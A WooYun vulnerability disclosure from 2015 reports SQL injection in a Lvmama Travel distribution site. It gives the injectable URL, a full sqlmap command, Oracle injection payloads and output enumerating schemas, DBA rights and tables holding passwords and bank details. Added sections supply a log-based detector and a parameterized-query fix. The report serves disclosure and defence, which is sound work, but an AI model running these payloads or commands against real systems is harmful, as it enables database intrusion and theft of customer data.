Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0153210

Title: Lvmama Travel (驴妈妈旅游网): multiple SQL injections on one of its sites (DBA privilege + 20 databases + 400+ users + 18 administrators + tens of thousands of records)

Related vendor: Lvmama Travel (驴妈妈旅游网)

Author: 路人甲

Submitted: 2015-11-10 09:30

Fixed: 2015-12-25 09:42

Published: 2015-12-25 09:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-10: Details sent to the vendor; awaiting vendor action
2015-11-10: Vendor confirmed; details visible to the vendor only
2015-11-20: Details disclosed to core white hats and domain experts
2015-11-30: Details disclosed to regular white hats
2015-12-10: Details disclosed to intern white hats
2015-12-25: Details disclosed to the public

Brief description:

Found this last night, but I was too tired to test it; I got up a bit early this morning and spent a little time testing it!

Detailed description:

Any gifts on offer? Heh!
Injection point:
http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11
I assumed it had already been fixed, so I ran sqlmap directly with the extra options --level 3 --risk 3; two of the parameters turned out to be injectable!
sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11" --threads 10 --dbms "Oracle" --level 3 --risk 3 -p action,view_id,tree_id,sdate --current-user --current-db --is-dba
The test results show that the fix for both view_id and tree_id was incomplete; they are still vulnerable.
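A defender-side check for probes of this kind, added here as an example (it is not part of the original report and not Lvmama's code): a Python script that parses constructed Apache-style access-log lines for list0.jsp, decodes each query string and flags parameter values that match the technique families sqlmap reported against view_id and tree_id (numeric boolean tautologies, Oracle XMLType error-based probes, DBMS_PIPE.RECEIVE_MESSAGE time-based probes, CHR() concatenation), plus any non-integer value for tree_id, which the sqlmap output identifies as an unescaped numeric parameter. The log lines, the client address 203.0.113.5 and the NUMERIC_PARAMS set are constructed assumptions; the query-string payloads are the ones the report shows.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined-style, not taken from
# the report); the query strings reuse the payloads sqlmap reported for list0.jsp.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2015:08:03:30 +0800] "GET /m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2015:08:03:31 +0800] "GET /m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0%20AND%207040%3D7040&sdate=2015-11-11 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2015:08:03:32 +0800] "GET /m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc%27%20AND%202948%3D2948%20AND%20%27KuUs%27%3D%27KuUs&tree_id=0&sdate=2015-11-11 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Nov/2015:08:03:33 +0800] "GET /m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0%20AND%204368%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%2879%29%2C5%29&sdate=2015-11-11 HTTP/1.1" 200 5120
"""

# Client address, request method and target of one combined-format log line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Signatures for the technique families sqlmap used against this endpoint.
RULES = [
    ("boolean_tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("oracle_time_based", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I)),
    ("oracle_error_based", re.compile(r"XMLTYPE\s*\(", re.I)),
    ("chr_concat", re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)),
]

# Parameters the application treats as integers (tree_id per the sqlmap output;
# assumption for any other deployment). A non-digit value is suspicious on its own.
NUMERIC_PARAMS = {"tree_id"}


def classify_value(name, value):
    """Return the list of rule names that fire for one decoded parameter value."""
    rules = [label for label, pattern in RULES if pattern.search(value)]
    if name in NUMERIC_PARAMS and not value.strip().lstrip("-").isdigit():
        rules.append("non_numeric_value")
    return rules


def scan_log(text):
    """Parse each request line, decode its query string and report suspicious params."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs percent-decodes the values, so the rules see the raw SQL fragments.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                rules = classify_value(name, value)
                if rules:
                    findings.append({"ip": ip, "param": name, "value": value, "rules": rules})
    return findings


def hits_per_source(findings):
    """Count flagged requests per client IP; a burst from one address marks a scanner."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f["ip"], f["param"], f["rules"], repr(f["value"]))
    print(hits_per_source(hits))
```

The first sample line is the benign request from the report and produces no finding; the next three reproduce one payload each and are flagged by signature, and the two tree_id payloads are additionally flagged because the value is not an integer. The numeric-type check is the more durable of the two: signatures can be evaded by a different tool or encoding, but a numeric parameter carrying anything other than digits is wrong regardless of what it carries.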

1.jpg


2.jpg


[08:03:30] [WARNING] GET parameter 'sdate' is not injectable
sqlmap identified the following injection points with a total of 2729 HTTP(s) requests:
---
Place: GET
Parameter: tree_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 7040=7040&sdate=2015-11-11
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 2498=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(109)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (2498=2498) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL)&sdate=2015-11-11
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 4368=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(79)||CHR(80)||CHR(67),5)&sdate=2015-11-11
Place: GET
Parameter: view_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=prodlist&view_id=lfsqwc' AND 2948=2948 AND 'KuUs'='KuUs&tree_id=0&sdate=2015-11-11
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: action=prodlist&view_id=lfsqwc' AND 1770=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(109)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1770=1770) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND 'zMWH'='zMWH&tree_id=0&sdate=2015-11-11
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=prodlist&view_id=lfsqwc' AND 3721=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(120)||CHR(70)||CHR(90),5) AND 'wPuV'='wPuV&tree_id=0&sdate=2015-11-11
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: view_id, type: Single quoted string (default)
[1] place: GET, parameter: tree_id, type: Unescaped numeric
[q] Quit
> 0
[08:13:09] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[08:13:28] [INFO] fetching current user
[08:13:28] [INFO] retrieved: SAAS14
current user: 'SAAS14'
[08:13:28] [INFO] fetching current database
[08:13:28] [INFO] resumed: SAAS14
[08:13:28] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SAAS14'
[08:13:28] [INFO] testing if current user is DBA
current user is DBA: True
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SAAS19
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| USR_LOG | 58 |
| INFO_HOTEL_NUM | 44 |
| WX_USER_INFO | 44 |
| USR_LOGIN_LOG | 40 |
| INTERFACE_PROD_SYNC_LOG | 22 |
| USR_INFO | 10 |
| USR_LOGIN | 10 |
| INFO_TICKET | 9 |
| INFO_TICKET_RELVIEW | 9 |
| INFO_HOTEL | 8 |
| WX_SCENE_LOG | 6 |
| B2B_TICKET | 3 |
| B2B_TICKET_DETAIL | 3 |
| B2B_TICKET_PEOPLE | 3 |
| ORDER_LOG | 3 |
| USR_CREDIT_LOG | 3 |
| USR_GETPASS_LOG | 3 |
| USR_GRADE | 3 |
| B2B_GRADE_PRICE | 2 |
| INFO_TICKET_CUST | 2 |
| INFO_TICKET_NUM | 2 |
| USR_DOCUMENT_TEMP | 2 |
| USR_INFO_EXPRESS | 2 |
| USR_INTERFACE_INFO | 2 |
| WX_MSG | 2 |
| INFO_CONDS | 1 |
| INFO_NEWS | 1 |
| INFO_TICKET_EX | 1 |
| INFO_TICKET_PRICE | 1 |
| RECE_PAYMENT_DETAIL | 1 |
| RECE_PAYMENT_LIST | 1 |
| RECE_STATEMENT_LIST | 1 |
| USR_ACCOUNT_SET | 1 |
| USR_CREDIT | 1 |
| USR_PRINT_TEMP | 1 |
+-------------------------+---------+
Database: SAAS14
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| LVMAMA_PUSH_LOG | 2508709 |
| LVMAMA_VIEW | 69067 |
| USR_LOG | 57394 |
| CM_ORDER_LOG | 49478 |
| B2B_TICKET_PEOPLE | 32639 |
| PAY_ORDER_LOG | 29497 |
| B2B_TICKET | 28058 |
| B2B_TICKET_DETAIL | 28058 |
| B2B_TICKET_EX | 28029 |
| CM_SYNC_LOG | 27699 |
| INTERFACE_LVMAMA_LOG | 25790 |
| LVMAMA_PRODUCT_LIST | 23297 |
| INFO_TICKET | 23296 |
| ORDER_LOG | 22104 |
| INFO_TICKET_RELVIEW | 16531 |
| LVMAMA_CHUANHUO_LOG | 14636 |
| USR_LOGIN_LOG | 11414 |
| CM_PROD_LOG | 4591 |
| CM_SYNC_PROD_LOG | 4141 |
| PAY_BALANCE | 3770 |
| PAY_MOMEY_LOG | 2681 |
| B2B_TICKET_CHANGE | 1330 |
| B2B_CHANNEL_PRICE | 645 |
| LVMAMA_VIEW_INFO | 610 |
| INFO_TICKET_NUM | 559 |
| USR_LOGIN | 439 |
| INFO_TICKET_CUST | 417 |
| USR_INFO | 385 |
| B2B_CHANNEL_PRICE_DAY | 382 |
| USR_CREDIT_LOG | 369 |
| WX_SCENE_LOG | 308 |
| USR_GETPASS_LOG | 208 |
| INFO_TICKET_EX | 136 |
| LVMAMA_PRODUCT_INFO | 72 |
| USR_ATTENTION | 65 |
| ORDER_ABNORMAL_LOG | 51 |
| USR_INFO_B2C | 45 |
| WX_USER_INFO | 45 |
| USR_INTERFACE_INFO | 41 |
| INTERFACE_PROD_SYNC_LOG | 32 |
| WX_AD_DETAIL | 23 |
| USR_MEMBER | 18 |
| INFO_TICKET_PRICE | 6 |
| ORDER_CHANGE_LOG | 5 |
| WX_AD | 5 |
| USR_CREDIT | 4 |
| WX_AD_SEND_LOG | 4 |
| WX_MSG_TEMP | 2 |
| CUST_INFO_GROUP_CHANNEL | 1 |
| INFO_CONDS | 1 |
| INFO_TICKET_CANCEL | 1 |
| INTERFACE_XIECHENG_LOG | 1 |
| LVMAMA_UPDATE_FLAG | 1 |
| SAAS_DATAMAN | 1 |
| USR_DOCUMENT_TEMP | 1 |
| USR_INFO_EXPRESS | 1 |
| WX_ORDER_TASK | 1 |
+-------------------------+---------+
Database: SAAS14
Table: USR_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| CUST_ID | NUMBER |
| LOG_DATE | DATE |
| LOG_DESC | VARCHAR2 |
| LOG_NUM | VARCHAR2 |
| LOG_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_LOGIN_LOG
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| COOKIEID | VARCHAR2 |
| CUST_ID | NUMBER |
| IP | VARCHAR2 |
| LOGIN_DATE | DATE |
| LOGIN_TYPE | NUMBER |
| PARENT_CUST_ID | NUMBER |
| USER_ID | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_INFO_EXPRESS
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| ACCOUNT_NO | VARCHAR2 |
| CUST_ID | NUMBER |
| FROM_ADDRESS | VARCHAR2 |
| FROM_COM | VARCHAR2 |
| FROM_MAN | VARCHAR2 |
| FROM_TEL | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| SHIP_INFO | VARCHAR2 |
| UPDATE_DATE | DATE |
+----------------+----------+
Database: SAAS14
Table: USR_CREDIT
[8 columns]
+----------------+--------+
| Column | Type |
+----------------+--------+
| ALL_CREDIT_NUM | NUMBER |
| CREATE_DATE | DATE |
| CREDIT_CUST_ID | NUMBER |
| CREDIT_NUM | NUMBER |
| CREDIT_TYPE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| USE_CREDIT_NUM | NUMBER |
+----------------+--------+
Database: SAAS14
Table: USR_INFO
[95 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| KEY | VARCHAR2 |
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| AGREEMENT_DATE | DATE |
| AGREEMENT_IP | VARCHAR2 |
| AGREEMENT_USER | VARCHAR2 |
| ANDROID_UID | VARCHAR2 |
| AREA_ID | NUMBER |
| ATTENT_COUNT | NUMBER |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_CITYCODE | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BEIANHAO | VARCHAR2 |
| CHECK_PRINT_NUM | NUMBER |
| CHECK_PRINT_PRICE | VARCHAR2 |
| CONTRACT_END_DATE | DATE |
| CONTRACT_PERSON | VARCHAR2 |
| CONTRACT_START_DATE | DATE |
| CURRENCY_TYPE | NUMBER |
| CUST_CODE | VARCHAR2 |
| CUST_DESC | CLOB |
| CUST_GAT_FEE | NUMBER |
| CUST_GAT_LIMIT | NUMBER |
| CUST_GRADE | NUMBER |
| CUST_ID | NUMBER |
| CUST_NAME | VARCHAR2 |
| CUST_PAY_FEE | NUMBER |
| CUST_TYPE | NUMBER |
| CUST_WEBSITE | VARCHAR2 |
| DEPOSIT | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| FEE | NUMBER |
| GET_MONEY_MODE | NUMBER |
| INTERFACE_PAY_TYPE | NUMBER |
| IS_B2B | NUMBER |
| IS_CHECK | NUMBER |
| IS_CHECK_VALUES | VARCHAR2 |
| IS_CONFIRM_ORDER | NUMBER |
| IS_DISCOUNT | NUMBER |
| IS_GAT_MONEY | NUMBER |
| IS_GROUP | NUMBER |
| IS_POST | NUMBER |
| IS_PRODMANAGER | NUMBER |
| IS_SAAS | NUMBER |
| IS_SENDSMS | NUMBER |
| IS_WHILE | NUMBER |
| LAST_IP | VARCHAR2 |
| LINK_ADDRESS | VARCHAR2 |
| LINK_EMAIL | VARCHAR2 |
| LINK_FAX | VARCHAR2 |
| LINK_MOBILE | VARCHAR2 |
| LINK_NAME | VARCHAR2 |
| LINK_PHONE | VARCHAR2 |
| LINK_QQ | VARCHAR2 |
| LINK_SOURCE | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LOGO | VARCHAR2 |
| MANAGER_MEMO | CLOB |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_POWER | NUMBER |
| ORDER_MONEY | NUMBER |
| ORDER_POWER_FIELD | VARCHAR2 |
| ORDER_TICKET | NUMBER |
| PARENT_AGENT_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_MODE | NUMBER |
| PRICESTATE_PUSHMAIL | VARCHAR2 |
| PROD_COUNT | NUMBER |
| REG_DATE | DATE |
| REG_IP | VARCHAR2 |
| REMARK | VARCHAR2 |
| REPORT_POWER | VARCHAR2 |
| RETURN_MODE | NUMBER |
| SALE_CHANNEL | VARCHAR2 |
| SALE_COUNT | NUMBER |
| SALE_MONEY | NUMBER |
| SALE_TICKET | NUMBER |
| SALE_TYPE | NUMBER |
| SEAL_PATH | VARCHAR2 |
| SENDMSG_MOBILE | VARCHAR2 |
| SENDMSG_SMS | VARCHAR2 |
| SERVICE_FEE_PAY | NUMBER |
| SOURCE_URL | VARCHAR2 |
| STATE | NUMBER |
| STOP_DATE | DATE |
| STOP_IP | VARCHAR2 |
| STOP_USER | VARCHAR2 |
| USER_ID | VARCHAR2 |
| VIP | NUMBER |
| WHILE_RELCODE | VARCHAR2 |
+---------------------+----------+
Database: SAAS14
Table: PAY_MOMEY_LOG
[17 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| CUR_BALANCE | NUMBER |
| CUST_ID | NUMBER |
| ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PAY_ACCOUNT | VARCHAR2 |
| PAY_BALANCE_ID | NUMBER |
| PAY_DATE | DATE |
| PAY_LOG | CLOB |
| PAY_NUM | NUMBER |
| PAY_SERVICE | VARCHAR2 |
| PAY_SERVICE_ORDER_ID | VARCHAR2 |
| PAY_TYPE | NUMBER |
| REC_BALANCE | NUMBER |
| STATE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_REMARK | CLOB |
| WORKFLOWNO | VARCHAR2 |
+----------------------+----------+
Database: SAAS14
Table: USR_MEMBER
[26 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BOOK_COUNT | NUMBER |
| DEPOSIT | NUMBER |
| EMAIL | VARCHAR2 |
| IMG | VARCHAR2 |
| LAST_LOGIN | DATE |
| LOGIN_COUNT | NUMBER |
| LOGIN_TYPE | NUMBER |
| MOBILE | VARCHAR2 |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_ID | NUMBER |
| OUT_USER_ID | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| REG_DATE | DATE |
| STATUS | NUMBER |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| VCODE | VARCHAR2 |
+-------------------+----------+
Database: SAAS14
Table: WX_USER_INFO
[21 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| AREA_ID | NUMBER |
| CITY | VARCHAR2 |
| COUNTRY | VARCHAR2 |
| CREATE_DATE | DATE |
| CUST_ID | NUMBER |
| HEADIMGURL | VARCHAR2 |
| LOGIN_DATE | DATE |
| NICKNAME | VARCHAR2 |
| OPENID | VARCHAR2 |
| ORDER_CUST_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PROVINCE | VARCHAR2 |
| SEX | NUMBER |
| SOURCE_ID | NUMBER |
| STATE | NUMBER |
| SUBSCRIBE_TIME | DATE |
| TREE_ID | NUMBER |
| UNSUBSCRIBE_TIME | DATE |
| USER_ID | VARCHAR2 |
| USER_LANGUAGE | VARCHAR2 |
| USER_MEMO | VARCHAR2 |
+------------------+----------+
Database: SAAS14
Table: USR_LOGIN
[32 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| CUST_ID | NUMBER |
| CZ_STARTTIME | DATE |
| CZCODE | VARCHAR2 |
| DEPT_ID | NUMBER |
| DUTY_STATE | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| IS_CZ | NUMBER |
| IS_DISPRICE | NUMBER |
| IS_MANAGER | NUMBER |
| IS_ORDERLIST | NUMBER |
| IS_PAY | NUMBER |
| IS_SHOWSYSTEMMSG | NUMBER |
| IS_VALIDATE | NUMBER |
| LAST_DATE | DATE |
| LAST_IP | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LYT_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| PARENT_AGENT_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PWD | VARCHAR2 |
| ROLE_ID | NUMBER |
| ROLE_TYPE | NUMBER |
| USER_GRADE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PERMISSION | VARCHAR2 |
| USER_STATE | NUMBER |
+------------------+----------+


3.jpg


4.jpg


5.jpg


6.jpg


For lack of time, I won't go any further with proof or with account passwords!

Proof of vulnerability:

As above.

Fix recommendation:

You know what to do!
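The fix section leaves the remedy implicit, so here is an added example, not the site's own code (which is JSP), showing the defect and its fix side by side in Python with sqlite3 standing in for the Oracle backend. The vulnerable function builds the SQL by string concatenation from view_id and tree_id, which is what the sqlmap results imply: view_id sits inside single quotes and tree_id is inserted as a bare number. The safe function validates tree_id as an integer and binds both values through named placeholders (':view_id', ':tree_id'), the same bind-variable style Oracle drivers use. The product_list table, its rows and the function names are constructed for the example; the two payloads are the boolean-based ones from the sqlmap output above.

```python
import sqlite3

# sqlite3 stands in for the Oracle backend (assumption); its ':name' placeholders
# mirror the bind-variable syntax an Oracle JDBC/JSP application would use.


def make_db():
    """Build an in-memory table with constructed rows (not data from the report)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE product_list (prod_id INTEGER, view_id TEXT, tree_id INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO product_list VALUES (?, ?, ?, ?)",
        [
            (1, "lfsqwc", 0, "constructed product A"),
            (2, "lfsqwc", 1, "constructed product B"),
            (3, "other", 0, "constructed product C"),
        ],
    )
    return conn


def list_products_vulnerable(conn, view_id, tree_id):
    """The defect the report implies: request parameters pasted into the SQL text.

    view_id lands inside single quotes (sqlmap: 'Single quoted string') and
    tree_id lands bare (sqlmap: 'Unescaped numeric'), so either can extend WHERE.
    """
    sql = (
        "SELECT prod_id FROM product_list "
        f"WHERE view_id = '{view_id}' AND tree_id = {tree_id}"
    )
    return [row[0] for row in conn.execute(sql)]


def list_products_safe(conn, view_id, tree_id):
    """Validate the numeric parameter, then bind both values; the SQL text is constant."""
    if not isinstance(tree_id, str) or not tree_id.isdigit():
        raise ValueError("tree_id must be a non-negative integer")
    sql = "SELECT prod_id FROM product_list WHERE view_id = :view_id AND tree_id = :tree_id"
    return [row[0] for row in conn.execute(sql, {"view_id": view_id, "tree_id": int(tree_id)})]


# The two boolean-based payloads from the sqlmap output in the report.
TREE_ID_PAYLOAD = "0 AND 7040=7040"
VIEW_ID_PAYLOAD = "lfsqwc' AND 2948=2948 AND 'KuUs'='KuUs"


def compare():
    """Run benign and payload inputs through both versions and return the outcomes."""
    conn = make_db()
    out = {
        "vuln_benign": list_products_vulnerable(conn, "lfsqwc", "0"),
        # Both payloads append a true condition, so the concatenating version
        # returns exactly the benign result: the signal boolean-based blind uses.
        "vuln_tree_payload": list_products_vulnerable(conn, "lfsqwc", TREE_ID_PAYLOAD),
        "vuln_view_payload": list_products_vulnerable(conn, VIEW_ID_PAYLOAD, "0"),
        "safe_benign": list_products_safe(conn, "lfsqwc", "0"),
        # Bound as a value, the string payload matches no row and alters nothing.
        "safe_view_payload": list_products_safe(conn, VIEW_ID_PAYLOAD, "0"),
    }
    try:
        list_products_safe(conn, "lfsqwc", TREE_ID_PAYLOAD)
        out["safe_tree_payload"] = "accepted"
    except ValueError as exc:
        out["safe_tree_payload"] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    for label, result in compare().items():
        print(f"{label:20s} {result}")
```

Run stand-alone it prints the six outcomes. With the concatenating version the payloads return the same rows as a benign request, which is precisely what sqlmap keys on to infer true and false answers one bit at a time; with the bound version the string payload is just a value that matches nothing, and the numeric payload is rejected before any SQL is built. A second point the sqlmap output makes is that the application account is a DBA (current user is DBA: True) and can see every schema, so the application should connect as an account restricted to its own schema, which keeps any future injection from reaching the other SAAS schemas.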

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-11-10 09:42

Vendor reply:

thx

Latest status:

None yet

